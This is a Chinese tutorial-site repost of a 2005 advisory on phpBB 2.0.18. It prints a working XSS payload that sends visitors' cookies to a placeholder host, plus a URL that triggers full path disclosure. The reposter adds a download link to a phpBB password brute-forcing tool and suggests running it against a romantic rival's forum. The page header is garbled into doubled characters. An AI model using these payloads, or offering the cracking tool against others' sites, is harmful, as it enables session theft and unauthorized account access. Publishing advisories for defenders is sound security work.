亲宝软件园·资讯

展开

phpBB论坛程序:老革命遇见新问题

人气:0
想了解phpBB论坛程序:老革命遇见新问题的相关内容吗,在本文为您仔细讲解的相关知识和一些Code实例,欢迎阅读和指正,我们先划重点:phhppBBBB论论坛坛程程序序老老革革命命遇遇见见新新问问题题,下面大家一起来学习吧。
phpBB 2.0.18 XSS and Full Path Disclosure 

Details: SecurityAlert   

还有一个是暴力破解的工具,单线程的, 也没有大用处,实在情敌开了个什么phpbb什么的也可以拿来跑密码 

下载:http://ftpzhangxue.w205.100dns.com/tools/phpbb.rar 
     Topic : phpBB 2.0.18 XSS and Full Path Disclosure 

    SecurityAlert Id : 269 

     SecurityRisk : Low 

     Remote Exploit : Yes 

     Local Exploit : No 

     Exploit Given : Yes 

     Credit : Maksymilian Arciemowicz 

     Date : 17.12.2005  

  Affected Software :  phpBB <= 2.0.18  

  Advisory Text : 

-----BEGIN PGP SIGNED MESSAGE----- 
Hash: SHA1 

[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22] 

Author: Maksymilian Arciemowicz (cXIb8O3) 
Date: 16.12.2005 
from securityreason.com TEAM 

- --- 0.Description --- 
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar 
d package. phpBB has a user-friendly interface, simple and straightforward administration  
panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL 
, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so 
lution for all web sites. 
Contact with author http://www.phpbb.com/about.php. 

- --- 1. XSS --- 
If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile "Always al 
low HTML: YES" or are you Guest 

that you can use this tags: 

<B C=">" onmouseover="alert('SecurityReason.Com')" X="<B "> H E L O </B> 

Exploit: 

<B C=">" onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie) 
" X="<B "> H A L O </B> 

and have you cookies. 

- --- 2. Full Path Disclosure --- 
In file admin/admin_disallow.php is 

- -25-31--- 
if( !empty($setmodules) ) 

$filename = basename(__FILE__); 
$module['Users']['Disallow'] = append_sid($filename); 

return; 

- -25-31--- 

function append_sid() dosen't exists. And if you have: 

register_globals = On 
display_errors = On 

Try to go: 
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1 

- -RESULT ERROR--- 
Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disa 
llow.php on line 28 
- -RESULT ERROR--- 

- --- 3. Greets --- 
sp3x 

- --- 4.Contact --- 
Author: Maksymilian Arciemowicz < cXIb8O3 > 
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com 
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg 
securityreason.com TEAM 
-----BEGIN PGP SIGNATURE----- 
Version: GnuPG v1.4.2 (FreeBSD) 

iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D 
/0u14EN2sQAh1Bwu0yvT48Q= 
=lsL8 
-----END PGP SIGNATURE----- 

哦,对了, 最上面那个好象也许大概似乎我猜是这个意思: 

个性签名: 
您填写的个性签名自动附带在您的发表的文章底部。个性签名有512个字符的限制。 

禁止HTML标签 
允许风格标签 
允许表情图标 

找到可以“允许HTML标签” 

加载全部内容

相关教程
猜你喜欢
用户评论